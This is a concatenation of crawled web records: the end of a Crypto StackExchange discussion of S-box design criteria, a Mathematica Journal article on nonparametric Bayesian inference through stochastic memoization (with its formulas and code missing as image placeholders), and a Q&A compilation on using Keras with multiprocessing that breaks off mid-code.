need from the S-box, and then generate the S-box accordingly.\n\nYou can't separate the design of the S-box from the design of the rest of the cipher. There is no universal set of criteria that make for a good S-box. For instance, AES had one set of criteria for their S-boxes. DES had a totally different set of criteria.\n\nCriteria of Good S-Box **• Balanced Component functions\n\n• Non-linearity of Component functions high\n\n• Non-zero linear combinations of Component functions balanced and highly non-linear\n\n• Satisfies SAC\n\n• High Algebraic degree**\n\nHope it helps\n\n• I don't think that this is helpful if you don't supply any information that supports your claim. – miracle173 Jul 20 '16 at 10:19\n• Not only is any kind of logical reasoning missing from this list, the keywords also are too unspecific to add any new information. Considering there are already well-written answers and this is the 3rd revival of the question (see answer dates), five years after the question, this seems a little pointless. – tylo Jul 21 '16 at 13:38\n\nI would just like to add that another important property of S-boxes when using directly on input (e.g. in Substitution-Permutation networks) is resistance to differential cryptoanalysis. Differential cryptoanalysis depends on the fact that a certain differential characteristic between two chosen inputs (I0 and I1) propogates to a differential characteristic between two outputs. A wonderful demonstration and easy to understand explanation can be seen here where a flawed S-box is generated to demonstrate this fact. There are very few good S-boxes, for instance, 4-bit S-boxes were all enumarated of which only 16 optimal ones were found (and among those there are few most optimal), this means that out of a possible 16! (approx. 2^44.2) only 2^4 acceptable ones were found." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9162176,"math_prob":0.91570544,"size":5210,"snap":"2020-34-2020-40","text_gpt3_token_len":1168,"char_repetition_ratio":0.10007683,"word_repetition_ratio":0.029478459,"special_character_ratio":0.21880998,"punctuation_ratio":0.08521058,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9557624,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-19T09:30:17Z\",\"WARC-Record-ID\":\"<urn:uuid:e160fb9a-7d04-4658-9175-6b1ed12bf69e>\",\"Content-Length\":\"192954\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:706454ef-2e0c-4a58-a240-965504611b9c>\",\"WARC-Concurrent-To\":\"<urn:uuid:ed069ee6-d410-4247-8442-a1f3a884810e>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/1297/desirable-s-box-properties?noredirect=1\",\"WARC-Payload-Digest\":\"sha1:XDNC3U6FG5SSMWJ2NNOLD73FLEZEZZOH\",\"WARC-Block-Digest\":\"sha1:UGY5SGH7B7IRFC72HTST7XBE34XQNBVM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400191160.14_warc_CC-MAIN-20200919075646-20200919105646-00425.warc.gz\"}"}
https://www.mathematica-journal.com/2014/01/09/probabilistic-programming-with-stochastic-memoization/
[ "John Cassel\n\n## Probabilistic Programming with Stochastic Memoization", null, "NB", null, "CDF", null, "PDF\n\n### Implementing Nonparametric Bayesian Inference\n\nProbabilistic programming is a programming language paradigm receiving both government support and the attention of the popular technology press . Probabilistic programming concerns writing programs with segments that can be interpreted as parameter and conditional distributions, yielding statistical findings through nonstandard execution. Mathematica not only has great support for statistics, but has another language feature particular to probabilistic language elements, namely memoization, which is the ability for functions to retain their value for particular function calls across parameters, creating random trials that retain their value. Recent research has found that reasoning about processes instead of given parameters has allowed Bayesian inference to undertake more flexible models that require computational support. This article explains this nonparametric Bayesian inference, shows how Mathematica‘s capacity for memoization supports probabilistic programming features, and demonstrates this capability through two examples, learning systems of relations and learning arithmetic functions based on output.\n\n### Nonparametric Bayesian Inference\n\nBayesian statistics are an orderly way of finding the likelihood of a model from data, using the likelihood of the data given the model. From spam detection to medical diagnosis, spelling correction to forecasting economic and demographic trends, Bayesian statistics have found many applications, and even praise as mental heuristics to avoid overconfidence. However, at first glance Bayesian statistics suffer from an apparent limit: they can only make inferences about known factors, bounded to conditions seen within the data, and have nothing to say about the likelihood of new phenomena . In short, Bayesian statistics are apparently withheld to inferences about the parameters of the model they are provided.\n\nInstead of taking priors over factors of the model itself, we can say that we are taking priors over factors in the process involving how the data was generated. These stochastic process priors give the modeler a way to talk about factors that have not been directly observed. These nonobservable factors include the likely rate at which further factors might be seen, given further observation and underlying categories or structures that might generate the data being observed. For example, in statistics problems we are often presented with drawing marbles of different colors from a bag, and given randomly drawn samples, we might talk about the most likely composition of the bag and the range of likely compositions. However, suppose we had a number of bags, and we drew two marbles each from three of them, discovering two red marbles, two green marbles, and two yellow marbles . If we were to draw marbles from yet another bag, we might expect two marbles identical in color, of a color we have not previously observed. We do not know what this color is, and in this sense we have made a nonparametric inference about the process that arranged the marbles between bags.\n\nThe ability to talk about nonobserved parameters is a leap in expressiveness, as instead of explicitly specifying a model for all parameters, a model utilizing infinite processes expands to fit the given data. This should be regarded similarly to the advantages afforded by linked data structures in representing ordinary data. A linked list has a potentially infinite capacity; its advantage is not that we have an infinite memory, but an abstract flexibility to not worry too much about maintaining its size appropriately. Similarly, an infinite prior models the growth we expect to discover .\n\nHere are two specific processes that are useful for a number of different problems. These two processes are good for modeling unknown discrete categories and sets of features, respectively. In both of these processes, suppose that we can take samples so that there are no dependencies in the order that we took them, or in other words that the samples are exchangeable. Both of these processes also make use of a concentration parameter,", null, ". As we look at more samples, we expect the number of new elements we discover to diminish, but not disappear, as our observations establish a lower frequency of occurrence for unobserved elements. The concentration parameter establishes the degree to which the proportions are concentrated, with low", null, "indicating a distribution concentrated on a few elements, and high", null, "indicating a more dispersed concentration.\n\nFirst, let us look into learning an underlying system of categories. In a fixed set of categories of particular likelihood, the probability of a given sample in a particular category corresponds to the multinomial distribution, the multiparameter extension of the Bernoulli distribution. The conjugate prior, or the distribution that gives a Bayesian estimate of which multinomial distribution produced a given sample, is the Dirichlet distribution, itself the multivariable extension of the beta distribution. To create an infinite Dirichlet distribution, or rather a Dirichlet process, one can simply have a recursive form of the beta where the likelihood of a given category is", null, ". To use a Dirichlet process as a prior, it is easier to manipulate in the form of a Chinese restaurant process (CRP) . Suppose we want to know the likelihood that the", null, "sample is a member of category", null, ". If the category is new, then that probability corresponds to the size of the concentration parameter in ratio to the count of the samples taken:", null, "The implementation of this function is straightforward. The use of a parameterized random number function allows for the use of the algorithm in common random number comparison between simulation scenarios , as well as for estimation through Markov chain Monte Carlo, about which more will be said later.", null, "", null, "", null, "In the second process, suppose we are interested in the sets of features observed in sets of examples. For example, suppose we go to an Indian food buffet and are unfamiliar with the dishes, so we observe the selected items that our fellow patrons have chosen. Supposing one overall taste preference, we might say that the likelihood of a dish’s being worth selecting is proportional to the number of times it was observed, but if there are not many examples we should also try some additional dishes that were not tried previously. This process, called the Indian buffet process , turns out to be equivalent to a beta process prior . Suppose we want to know the likelihood of whether a given feature", null, "is going to be found in the", null, "sample. Then, the likelihoods can be calculated directly from other well-understood distributions:", null, "Both of these processes are suitable as components in mixture models. Suppose we are conducting a phone poll of a city and ask the citizens we talk to about their concerns. Each person will report their various civic travails. We expect for each person to have their own varying issues, but also for there to be particular groups of concern for different neighborhoods and professional groups. In other words, we expect to see an unknown set of features emerge from an unknown set of categories. Then, we might use a CRP", null, "IBP mixture distribution to help learn those categories from the discovered feature sets.\n\nNonparametric inference tasks are particularly suited for computational support. What we would like to do is describe a space of potential mixture models that may describe the underlying data-generation processes and allow the inference of their likelihood without explicitly generating the potential structures of that space. Probabilistic programming is the use of language-specific support to aid in the process of statistical inference. This article shows that Mathematica has features that readily enable the sort of probabilistic programming that supports nonparametric inference.\n\n### Probabilistic Programming\n\nProbabilistic programming is the use of language-specific support to aid in the process of statistical inference. Unlike statistical libraries, the structure of the programming language itself is used in the inference process . Although Mathematica increasingly has the kinds of structures that support probabilistic programming, we are not going to focus on those features here. Instead, we will see how Mathematica‘s natural capacity for memoization allows it to be very easily extended to write probabilistic programs that use stochastic memoization as a key abstraction. In particular, we are going to look at Church, a Lisp-variant with probabilistic query and stochastic memoization constructs . Let us now explain stochastic memoization and then look at how to implement Metropolis-Hastings querying, which uses memoization to help implement Markov chain Monte Carlo-driven inference.\n\n#### Stochastic Memoization\n\nStochastic memoization simply means remembering probabilistic events that have already occurred. Suppose we say that", null, "is the first flip of coin c. In the first call, it may return Heads or Tails, depending on a likelihood imposed to coin c, but in either case it is constrained in later calls to return the same value. Once undertaken, the value of a particular random event is determined.\n\nIn Church, this memoization is undertaken explicitly through its mem operator. Church’s flip function designates a Bernoulli trial with the given odds, with return values 0 and 1. Here is an example of a memoized fair coin flip in Church.\n\n`(define coinflip (mem (lambda (coin flip) (flip 0.5))))`\n\nMathematica allows for a similar memoization by incorporating a Set within a SetDelayed.", null, "Let us now look to a more complicated case. Earlier, we discussed the Dirichlet process. Church supports a DPmem operator for creating functions that when given a new example either returns a previously obtained sample according to the CRP or takes a new sample, depending upon the category assignment, and returns the previously seen argument. Here is a similar function in Mathematica, called GenerateMemCRP. Given a random function, we first create a memoized version of that function based on the category index of the CRP. Then, we create an empty initial CRP result, for which a new sample is created and memoized every time a new input is provided, potentially also resampling the provided function if a prediscovered category is provided.", null, "", null, "", null, "For example, let us now take a sampling from categories that have a parameter distributed according to the standard normal distribution. Here we see outputs in a typical range for a standard normal, but with counts favoring resampling particular results according to the sampled frequency of the corresponding category.", null, "", null, "Memoization implies that if we provide the same inputs, we get the same results.", null, "", null, "#### Metropolis-Hastings Querying\n\nInference is the central operation of probabilistic programming. Conditional inference is implemented in Church through its various query operations. These queries uniformly take four sets of arguments: query algorithm-specific parameters, a description of the inference problem, a condition to be satisfied, and the expression we want to know the distribution of given that condition. Let us motivate the need for a Mathematica equivalent to the Church query operator", null, "by explaining other queries that are trivial to implement in Mathematica but that are not up to certain inference tasks.\n\nDirect calculation is the most straightforward approach to conditional inference. However, sometimes we cannot directly compute the conditional likelihood, but instead have to sample the space. The easiest way to do so is rejection sampling, in which we generate a random sample for all random parameters to see if it meets the condition to be satisfied. If it does, its value is worth keeping as a sample of the distribution, and if it does not, we discard it entirely, proceeding until we are satisfied that we have found the distribution we intend.\n\nThere is a problem with rejection sampling, namely that much of the potential model space might be highly unlikely and that we are throwing away most of the samples. Instead of doing that, we can start at a random place but then, at each step, use that sample to find a good sample for the underlying distribution . So, for a sample", null, ", we are interested in constructing a transition operator", null, "yielding a new sample", null, ", and constructing that operator such that for the underlying distribution", null, ", the transition operator is invariant with respect to distribution", null, ", or in other words, that the transition operator forms a Markov chain. For our transition operator, we first choose to generate a random proposal,", null, ", where a simple choice is the normally distributed variation along all parameters", null, ", and then accept that proposal with likelihood", null, ", so that we are incorporating less-likely samples at exactly the rate the underlying distribution would provide. After some initial samples of random value, we will have found the region for which the invariance property holds. Due to the use of applying random numbers to a Markov chain, this algorithm is called Markov chain Monte Carlo, or MCMC.\n\nThe following procedure is intended to be the simplest possible implementation of MCMC using memoization (for further considerations see [13, 14]). There is a trade-off in the selection of", null, ", such that if it is too large, we rarely accept anything and would effectively be undertaking rejection sampling, but if it is too small, we tend to stay in a very local area of the algorithm. One way to manage this trade-off is to control", null, "by aiming for a given rejection rate, which is undertaken here.", null, "", null, "We now see why we constructed the CRP functions to accept random number functions: it lets us create evaluation functions suitable for MCMC.\n\n### Examples\n\nLet us look to see how we might apply these examples. First, we are going to look at the infinite relational model, which demonstrates how to use the CRP to learn underlying categories from relations. Then, we will look at learning arithmetic expressions based upon particular inputs and outputs, which demonstrates using probabilistic programming in a recursive setting.\n\n#### The Infinite Relational Model\n\nSuppose we are given some set of relations in the form of predicates, and we want to infer category memberships based on those relations. The infinite relational model (IRM) can construct infinite category models for processing arbitrary systems of relational data . Suppose now we have some specific instances of objects,", null, ", and a few specific statements about whether a given", null, "-ary relation,", null, ", holds between them or not. Given a prior of how concentrated categories are,", null, ", and a prior for the sharpness of a relation to holding between members of various types,", null, ", we would like to learn categories", null, "and relational likelihoods", null, ", such that we can infer category memberships for objects and the likelihood of unobserved relationships holding between them, which corresponds to the following model structure.", null, "Below we provide a sampler to calculate this, which first sets up memoization for category assignment, next memoization for relational likelihood, and then a function for first evaluating the object to category sampling and then the predicate/category sampling. Then, the function merely calculates the likelihood sampling along the way, returning the object to category memberships and the likelihood.", null, "", null, "To understand how this works, let us look at an example. Suppose that there are two elementary schools, one for girls and one for boys, and that they both join together for high school. However, there is a new teacher who does not know this about the composition of incoming classes. This teacher finds another teacher and asks if they know who knows whom. This more experienced teacher says yes, but not why, and the younger teacher asks a series of questions about who knows whom, to the confusion of the older teacher, who does not understand why the younger teacher does not know (we have all had conversations like this). One potential set of such questions might yield the following answers. Notice that there is a deficiency in these questions; namely, the new teacher never asks if a boy knows a girl.", null, "", null, "Given these samples, let us now perform a Metropolis-Hastings query to see if we can recover these categories. The result of a particular sample is a list of rules, where the left side of each rule is the likelihood of the given predicates to hold given the sampled model, and the right side is the sampled model in a two-element list. In this two-element list characterizing the sampled model, the first element is the result as provided by the evaluation method, and the second element contains the random values parameterizing the model.", null, "", null, "Given these samples, let us now find a list of categories that fit them. Normalize the weight of each example by its likelihood, filter out the sampling information, and gather the common results together.", null, "", null, "Removing the specific category assignments and determining for each person whether they are in the same category as each other, we see that we have a complete and accurate estimate for who knows whom.", null, "", null, "#### Learning Simple Arithmetic Expressions\n\nThere is no more idiomatic example of probabilistic programming than probabilistically generated programs. Here, we show how to implement learning simple arithmetic expressions. A Church program for undertaking this is as follows . First, it defines a function for equality that is slightly noisy, creating a gradient that is easier to learn than strict satisfaction. Next, it creates a random arithmetic expression of nested addition and subtraction with a single variable and integers from 0 to 10 as terminals. Then, it provides a utility for evaluating symbolically constructed expressions. Finally, it demonstrates sampling a program with two results that are consistent with adding 2 to the input.", null, "Let us now construct an equivalent Mathematica program. First, we will construct an equivalent noisy equality operator.", null, "", null, "Next, here is an equivalent program for generating random programs. By recursively indexing each potential branch of the program, we can assure that common random number and MCMC algorithms will correctly assign a random number corresponding to that exact part of the potential program. We also explicitly limit the size of the tree.", null, "", null, "Now we make a Metropolis-Hastings query and process the results down to the found expression and its calculated likelihood.", null, "Given only one example, we cannot tell very much, but are pleased that the simplest, yet correct, function is the one rated most likely. Interestingly, the first six expressions are valid despite the noisy success condition.", null, "", null, "With two inputs, the only viable expression is the one found.", null, "", null, "### Summary\n\nWe have now seen how to implement nonparametric Bayesian inference with Mathematica‘s memoization features. Nonparametric Bayesian inference extends Bayesian inference to processes, allowing for the consideration of factors that are not directly observable, creating flexible mixture models with similar advantages to flexible data structures. We see that Mathematica‘s capacity for memoization allows for the implementation of nonparametric sample generation and for Markov chain sampling. This capacity was then demonstrated with two examples, one for discovering the categories underlying particular observed relations and the other for generating functions that matched given results.\n\n### Conclusion\n\nProbabilistic programming is a great way to undertake nonparametric Bayesian inference, but one should not confuse language-specific constructs with the language features that allow one to undertake it profitably. Through Mathematica‘s memoization capabilities, it is readily possible to make inferences over flexible probabilistic models.\n\n### References\n\n DARPA. “Probabilistic Programming for Advancing Machine Learning (PPAML).” Solicitation Number: DARPA-BAA-13-31. (Aug 8, 2013) www.fbo.gov/utils/view?id=a7bdf07d124ac2b1dda079de6de2eb78. B. Cronin. “What Is Probabilistic Programming?” O’Reilly Radar (blog). (Aug 8, 2013) radar.oreilly.com/2013/04/probabilistic-programming.html. D. Fidler, “Foresight Defined as a Component of Strategic Management,” Futures, 43(5), 2011 pp. 540-544. doi:10.1016/j.futures.2011.02.005. C. Kemp, A. Perfors, and J. B. Tenenbaum, “Learning Overhypotheses with Hierarchical Bayesian Models,” Developmental Science, 10(3), 2007 pp. 307-321. doi:10.1111/j.1467-7687.2007.00585.x. M. I. Jordan, “Bayesian Nonparametric Learning: Expressive Priors for Intelligent Systems,” in Heuristics, Probability, and Causality: A Tribute to Judea Pearl, (R. Dechter, H. Geffner, and J. Y. Halpern, eds.) London: College Publications, 2010. J. Pitman, Combinatorial Stochastic Processes (Lecture Notes in Mathematics 1875), Berlin: Springer-Verlag, 2006. A. Law and D. Kelton, Simulation Modeling and Analysis, 3rd ed., Boston: McGraw-Hill, 2000. T. Griffiths and Z. Ghahramani, “Infinite Latent Feature Models and the Indian Buffet Process,” in Proceedings of the Eighteenth Annual Conference on Neural Information Processing Systems (NIPS 18), Whistler, Canada, 2004. books.nips.cc/papers/files/nips18/NIPS2005_0130.pdf. R. Thibaux and M. I. Jordan, “Hierarchical Beta Processes and the Indian Buffet Process,” in Proceedings of the Eleventh International Conference on Artificial Intelligence and Statistics (AISTATS 2007), San Juan, Puerto Rico, 2007. jmlr.org/proceedings/papers/v2/thibaux07a/thibaux07a.pdf. N. D. Goodman. “The Principles and Practice of Probabilistic Programming,” in Proceedings of the 40th Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, (POPL 2013) Rome, Italy, 2013 pp. 399-402. doi:10.1145/2429069.2429117. N. D. Goodman, V. K. Mansinghka, D. Roy, K. Bonawitz, and J. B. Tenenbaum, “Church: A Language for Generative Models,” in Proceedings of the Twenty-Fourth Conference on Uncertainty in Artificial Intelligence (UAI2008), Helsinki, Finland, 2008. www.auai.org/uai2008/UAI_camera_ready/goodman.pdf. I. Murray. Markov Chain Monte Carlo . (Aug 8, 2013) videolectures.net/mlss09uk_murray_mcmc. D. J. C. MacKay, Information Theory, Inference, and Learning Algorithms, Cambridge, UK: Cambridge University Press, 2003. www.inference.phy.cam.ac.uk/itila/book.html. C. Robert and G. Casella, Monte Carlo Statistical Methods, 2nd ed, New York: Springer, 2004. C. Kemp, J. B. Tenenbaum, T. L. Griffiths, T. Yamada, and N. Ueda, “Learning Systems of Concepts with an Infinite Relational Model,” in Proceedings of the 21st National Conference on Artificial Intelligence (AAAI-06), Boston, MA, 2006. www.aaai.org/Papers/AAAI/2006/AAAI06-061.pdf. N. D. Goodman, J. B. Tenenbaum, T. J. O’Donnell, and the Church Working Group. “Probabilistic Models of Cognition.” (Aug 8, 2013) projects.csail.mit.edu/church/wiki/Probabilistic_Models_of _Cognition. J. Cassel, “Probabilistic Programming with Stochastic Memoization,” The Mathematica Journal, 2014. dx.doi.org/doi:10.3888/tmj.16-1." ]
[ null, "https://www.mathematica-journal.com/wp-content/themes/tmj/images/download_icon.gif", null, "https://www.mathematica-journal.com/wp-content/themes/tmj/images/download_icon.gif", null, "https://www.mathematica-journal.com/wp-content/themes/tmj/images/download_icon.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_1.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_2.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_3.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_4.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_5.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_6.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_DisplayFormula_1.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_2.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_3.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_4.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_7.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_8.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_DisplayFormula_5.gif", null, "https://reference.wolfram.com/chars/RightArrow.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_9.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_6.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_7.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_8.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_9.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_10.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_1.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_11.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_2.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_10.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_11.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_12.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_13.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_14.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_15.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_16.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_17.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_18.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_19.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_20.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_12.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_13.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_21.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_22.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_23.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_24.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_25.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_26.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_27.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_DisplayFormula_14.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_15.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_16.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_17.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_18.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_19.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_3.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_20.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_4.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_21.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_5.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_program.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_22.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_6.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_23.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_24.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_25.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_26.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_7.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_27.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_8.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9059406,"math_prob":0.9009192,"size":23627,"snap":"2022-27-2022-33","text_gpt3_token_len":4845,"char_repetition_ratio":0.12699488,"word_repetition_ratio":0.013764045,"special_character_ratio":0.19837473,"punctuation_ratio":0.13149197,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97006434,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134],"im_url_duplicate_count":[null,null,null,null,null,null,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,4,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-04T03:56:53Z\",\"WARC-Record-ID\":\"<urn:uuid:8669ef8a-2941-475d-8e2d-2042c58a6edc>\",\"Content-Length\":\"48393\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ec81e617-4ea6-4ef4-9cc8-2305715f9a87>\",\"WARC-Concurrent-To\":\"<urn:uuid:0b91a57e-9dcf-4bbd-9ceb-7142b88917ce>\",\"WARC-IP-Address\":\"140.177.205.75\",\"WARC-Target-URI\":\"https://www.mathematica-journal.com/2014/01/09/probabilistic-programming-with-stochastic-memoization/\",\"WARC-Payload-Digest\":\"sha1:OXZWM2KYW7UDTFSI6XG2UF4SPV7NP43B\",\"WARC-Block-Digest\":\"sha1:GBFS7JGQKEEQCBXIO3CJ5Q7SWKG3HU7O\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104293758.72_warc_CC-MAIN-20220704015700-20220704045700-00105.warc.gz\"}"}
https://thetopsites.net/projects/neural-network/multiprocessing.shtml
[ "## Hot questions for Using Neural networks in multiprocessing\n\nQuestion:\n\nI'm using Keras with Tensorflow as backend.\n\nI am trying to save a model in my main process and then load/run (i.e. call `model.predict`) within another process.\n\nI'm currently just trying the naive approach from the docs to save/load the model: https://keras.io/getting-started/faq/#how-can-i-save-a-keras-model. So basically:\n\n1. `model.save()` in main process\n2. `model = load_model()` in child process\n3. `model.predict()` in child process\n\nHowever, it simply hangs on the `load_model` call.\n\nSearching around I've discovered this potentially related answer suggesting that Keras can only be utilized in one process: using multiprocessing with theano but am unsure if this is true (can't seem to find much on this).\n\nIs there a way to accomplish my goal? A high level description or short example is greatly appreciated.\n\nNote: I've attempted approaches along the lines of passing a graph to the process but failed since it seems tensorflow graphs aren't pickable (related SO post for that here: Tensorflow: Passing a session to a python multiprocess). If there is indeed a way to pass the tensorflow graph/model to the child process then I am open to that as well.\n\nThanks!\n\nFrom my experience - the problem lies in loading `Keras` to one process and then spawning a new process when the `keras` has been loaded to your main environment. But for some applications (like e.g. training a mixture of `Keras`models) it's simply better to have all of this things in one process. So what I advise is the following (a little bit cumbersome - but working for me) approach:\n\n1. DO NOT LOAD KERAS TO YOUR MAIN ENVIRONMENT. If you want to load Keras / Theano / TensorFlow do it only in the function environment. E.g. don't do this:\n\n```import keras\n\ndef training_function(...):\n...\n```\n\nbut do the following:\n\n```def training_function(...):\nimport keras\n...\n```\n2. Run work connected with each model in a separate process: I'm usually creating workers which are making the job (like e.g. training, tuning, scoring) and I'm running them in separate processes. What is nice about it that whole memory used by this process is completely freed when your process is done. This helps you with loads of memory problems which you usually come across when you are using multiprocessing or even running multiple models in one process. So this looks e.g. like this:\n\n```def _training_worker(train_params):\nimport keras\nmodel = obtain_model(train_params)\nmodel.fit(train_params)\nsend_message_to_main_process(...)\n\ndef train_new_model(train_params):\ntraining_process = multiprocessing.Process(target=_training_worker, args = train_params)\ntraining_process.start()\nget_message_from_training_process(...)\ntraining_process.join()\n```\n\nDifferent approach is simply preparing different scripts for different model actions. But this may cause memory errors especially when your models are memory consuming. NOTE that due to this reason it's better to make your execution strictly sequential.\n\nQuestion:\n\nI'm currently trying to implement multi-GPU training with the Tensorflow network. One solution for this would be to run one model per GPU, each having their own data batches, and combine their weights after each training iteration. In other words \"Data Parallelism\".\n\nSo for example if I use 2 GPUs, train with them in parallel, and combine their weights afterwards, then shouldn't the resulting weights be different compared to training with those two data batches in sequence on one GPU? Because both GPUs have the same input weights, whereas the single GPU has modified weights for the second batch.\n\nIs this difference just marginal, and therefore not relevant for the end result after many iterations?\n\nThe order of the batches fed into training makes some difference. But the difference may be small if you have large number of batches. Each batch pulls the variables in the model a bit towards the minimum of the loss. The different order may make the path towards minimum a bit different. But as long as the loss is decreasing, your model is training and its evaluation becomes better and better.\n\nSometimes, to avoid the same batches \"pull\" the model together and avoid being too good only for some input data, the input for each model replica would be randomly shuffled before feeding into the training program.\n\nQuestion:\n\nDue to the limitation of RAM memory, I followed these instructions and built a generator that draw small batch and pass them in the fit_generator of Keras. But Keras can't prepare the queue with the multiprocessing even I inherit the Sequence.\n\nHere is my generator for multiprocessing.\n\n```class My_Generator(Sequence):\ndef __init__(self, image_filenames, labels, batch_size):\nself.image_filenames, self.labels = image_filenames, labels\nself.batch_size = batch_size\n\ndef __len__(self):\nreturn np.ceil(len(self.image_filenames) / float(self.batch_size))\n\ndef __getitem__(self, idx):\nbatch_x = self.image_filenames[idx * self.batch_size:(idx + 1) * self.batch_size]\nbatch_y = self.labels[idx * self.batch_size:(idx + 1) * self.batch_size]\n\nreturn np.array([\nfor file_name in 